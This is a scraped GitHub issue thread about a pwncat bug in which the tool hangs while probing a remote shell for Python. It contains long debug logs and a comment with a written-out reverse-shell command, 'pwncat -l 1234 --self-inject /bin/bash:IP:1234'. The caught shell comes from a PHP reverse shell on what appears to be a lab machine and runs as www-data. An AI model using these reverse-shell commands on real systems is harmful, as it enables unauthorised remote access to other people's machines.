2020-06-12 17:05:34,127 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,127 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.6 && echo /opt/python3/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,127 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,151 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,151 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.7
2020-06-12 17:05:34,151 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,151 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.7 && echo /opt/python3/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,152 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,175 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,175 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3/bin/python3.8
2020-06-12 17:05:34,175 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,175 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3/bin/python3.8 && echo /opt/python3/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,175 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,201 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,201 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python
2020-06-12 17:05:34,201 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,202 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python && echo /opt/python3.5/bin/python || echo;\n'
2020-06-12 17:05:34,202 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,235 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,235 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2
2020-06-12 17:05:34,235 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,235 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2 && echo /opt/python3.5/bin/python2 || echo;\n'
2020-06-12 17:05:34,235 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,260 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,260 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python2.7
2020-06-12 17:05:34,260 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,261 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python2.7 && echo /opt/python3.5/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,261 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,284 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,284 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3
2020-06-12 17:05:34,284 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,284 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3 && echo /opt/python3.5/bin/python3 || echo;\n'
2020-06-12 17:05:34,284 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,311 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,311 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.5
2020-06-12 17:05:34,311 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,311 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.5 && echo /opt/python3.5/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,311 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,345 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,345 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.6
2020-06-12 17:05:34,346 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,346 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.6 && echo /opt/python3.5/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,346 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,371 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,371 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.7
2020-06-12 17:05:34,371 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,371 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.7 && echo /opt/python3.5/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,371 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,396 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,396 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.5/bin/python3.8
2020-06-12 17:05:34,396 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,396 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.5/bin/python3.8 && echo /opt/python3.5/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,396 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,422 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,422 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python
2020-06-12 17:05:34,422 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,422 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python && echo /opt/python3.6/bin/python || echo;\n'
2020-06-12 17:05:34,422 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,446 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,446 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2
2020-06-12 17:05:34,446 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,446 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2 && echo /opt/python3.6/bin/python2 || echo;\n'
2020-06-12 17:05:34,446 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,469 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,470 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python2.7
2020-06-12 17:05:34,470 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,470 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python2.7 && echo /opt/python3.6/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,470 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,495 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,496 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3
2020-06-12 17:05:34,496 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,496 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3 && echo /opt/python3.6/bin/python3 || echo;\n'
2020-06-12 17:05:34,497 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,522 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,522 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.5
2020-06-12 17:05:34,522 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,522 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.5 && echo /opt/python3.6/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,522 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,550 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,550 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.6
2020-06-12 17:05:34,551 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,551 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.6 && echo /opt/python3.6/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,551 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,593 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,593 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.7
2020-06-12 17:05:34,593 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,593 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.7 && echo /opt/python3.6/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,593 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,616 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,616 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.6/bin/python3.8
2020-06-12 17:05:34,616 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,616 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.6/bin/python3.8 && echo /opt/python3.6/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,616 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,649 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,649 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python
2020-06-12 17:05:34,649 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,649 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python && echo /opt/python3.7/bin/python || echo;\n'
2020-06-12 17:05:34,650 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,680 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,680 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2
2020-06-12 17:05:34,680 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,680 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2 && echo /opt/python3.7/bin/python2 || echo;\n'
2020-06-12 17:05:34,680 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,707 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,707 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python2.7
2020-06-12 17:05:34,707 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,708 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python2.7 && echo /opt/python3.7/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,708 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,733 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,733 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3
2020-06-12 17:05:34,733 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,733 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3 && echo /opt/python3.7/bin/python3 || echo;\n'
2020-06-12 17:05:34,733 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,774 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,774 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.5
2020-06-12 17:05:34,774 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,774 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.5 && echo /opt/python3.7/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,774 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,800 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,800 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.6
2020-06-12 17:05:34,800 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,800 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.6 && echo /opt/python3.7/bin/python3.6 || echo;\n'
2020-06-12 17:05:34,800 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,827 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,827 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.7
2020-06-12 17:05:34,828 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,828 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.7 && echo /opt/python3.7/bin/python3.7 || echo;\n'
2020-06-12 17:05:34,828 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,851 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,851 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.7/bin/python3.8
2020-06-12 17:05:34,851 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,851 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.7/bin/python3.8 && echo /opt/python3.7/bin/python3.8 || echo;\n'
2020-06-12 17:05:34,852 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,876 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,876 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python
2020-06-12 17:05:34,876 DEBUG [MainThread] 1803:send(): Trying to send 77 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,876 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python && echo /opt/python3.8/bin/python || echo;\n'
2020-06-12 17:05:34,876 DEBUG [MainThread] 1826:send(): Sent 77 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,902 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,902 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2
2020-06-12 17:05:34,902 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,902 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2 && echo /opt/python3.8/bin/python2 || echo;\n'
2020-06-12 17:05:34,902 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,927 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,928 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python2.7
2020-06-12 17:05:34,928 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,928 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python2.7 && echo /opt/python3.8/bin/python2.7 || echo;\n'
2020-06-12 17:05:34,928 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,954 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,954 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3
2020-06-12 17:05:34,954 DEBUG [MainThread] 1803:send(): Trying to send 79 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,954 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3 && echo /opt/python3.8/bin/python3 || echo;\n'
2020-06-12 17:05:34,954 DEBUG [MainThread] 1826:send(): Sent 79 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:34,986 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:34,986 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.5
2020-06-12 17:05:34,986 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:34,986 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.5 && echo /opt/python3.8/bin/python3.5 || echo;\n'
2020-06-12 17:05:34,986 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,010 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,010 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.6
2020-06-12 17:05:35,010 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,010 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.6 && echo /opt/python3.8/bin/python3.6 || echo;\n'
2020-06-12 17:05:35,010 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,033 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,033 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.7
2020-06-12 17:05:35,033 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,033 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.7 && echo /opt/python3.8/bin/python3.7 || echo;\n'
2020-06-12 17:05:35,034 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,106 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,106 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
2020-06-12 17:05:35,106 DEBUG [MainThread] 1803:send(): Trying to send 83 bytes to 10.10.182.191:45802
2020-06-12 17:05:35,106 TRACE [MainThread] 1809:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo;\n'
2020-06-12 17:05:35,106 DEBUG [MainThread] 1826:send(): Sent 83 bytes to 10.10.182.191:45802 (0 bytes remaining)
2020-06-12 17:05:35,130 DEBUG [MainThread] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,130 TRACE [MainThread] 1944:receive(): Received: '\n$ '
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.
2020-06-12 17:05:35,130 TRACE [RECV] 3476:run_action(): [RECV] Producer Start
2020-06-12 17:05:35,130 TRACE [STDIN] 3476:run_action(): [STDIN] Producer Start
2020-06-12 17:05:35,155 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,155 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 17:05:35,155 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '

$ 2020-06-12 17:05:35,220 DEBUG [RECV] 1938:receive(): Received 3 bytes from 10.10.182.191:45802
2020-06-12 17:05:35,220 TRACE [RECV] 1944:receive(): Received: '\n$ '
2020-06-12 17:05:35,220 TRACE [RECV] 3478:run_action(): [RECV] Producer received: '\n$ '

same thing

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

Also tried it on my internal system and i get the same results.

from pwncat.

cytopia avatar cytopia commented on July 28, 2024

How did you start the reverse shell on the remote side?

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

PHP reverse shell. Pen test monkeys one

from pwncat.

cytopia avatar cytopia commented on July 28, 2024

Can you try to use pwncat, nc or ncat directly as a reverse shell (also locally is fine) and see if that works. If it does can you send me the exact PHP reverse shell from Pen test monkey

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

Okay I'm glad you have found the cause of the issue. Unfortunately PHP reverse shell is quite a common haha

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

Amazing work!

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

just testing it now and it is hanging on probing the python

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

`kali@kali:~$ pwncat -l 1234 --self-inject /bin/bash:10.9.33.138:1234 -vvv
DEBUG [MainThread]: Creating (family 10/IPv6, TCP) socket
DEBUG [MainThread]: Disabling IPv4 support on IPv6 socket
DEBUG [MainThread]: Creating (family 2/IPv4, TCP) socket
DEBUG [MainThread]: Resolving IPv6 name not required, using wildcard: ::
DEBUG [MainThread]: Resolving IPv4 name not required, using wildcard: 0.0.0.0
DEBUG [MainThread]: Binding (family 10/IPv6, TCP) socket to :::1234
DEBUG [MainThread]: Binding (family 2/IPv4, TCP) socket to 0.0.0.0:1234
DEBUG [MainThread]: Listening with backlog=0
INFO [MainThread]: Listening on :::1234 (family 10/IPv6, TCP)
DEBUG [MainThread]: Listening with backlog=0
INFO [MainThread]: Listening on 0.0.0.0:1234 (family 2/IPv4, TCP)
DEBUG [MainThread]: Waiting for TCP client
INFO [MainThread]: Client connected from 10.10.124.240:35154 (family 2/IPv4, TCP)
[PWNCAT CnC] Checking if remote sends greeting...
DEBUG [MainThread]: Received 115 bytes from 10.10.124.240:35154
DEBUG [MainThread]: Received 240 bytes from 10.10.124.240:35154
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
16:57:53 up 15 min, 0 users, load average: 0.00, 0.10, 0.22
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
[PWNCAT CnC] Checking if remote sends prefix to every request...
DEBUG [MainThread]: Trying to send 1 bytes to 10.10.124.240:35154
DEBUG [MainThread]: Sent 1 bytes to 10.10.124.240:35154 (0 bytes remaining)
DEBUG [MainThread]: Received 2 bytes from 10.10.124.240:35154
[PWNCAT CnC] Remote prefix:
[b'$ ']
[PWNCAT CnC] Probing for: /bin/python
DEBUG [MainThread]: Trying to send 49 bytes to 10.10.124.240:35154
DEBUG [MainThread]: Sent 49 bytes to 10.10.124.240:35154 (0 bytes remaining)
DEBUG [MainThread]: Received 1 bytes from 10.10.124.240:35154
DEBUG [MainThread]: Received 2 bytes from 10.10.124.240:35154

`
it then crashes the terminal

from pwncat.

dalemazza avatar dalemazza commented on July 28, 2024

just to confirm it is working using just pwncat -l 1234 just not my above syntax

from pwncat.

cytopia avatar cytopia commented on July 28, 2024

The branch where this is being fixed is release-0.1.0 with commit 907c5b51bba34d3be1c7d2d9bf65b8df79a2829a (currently the latest commit)

from pwncat.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.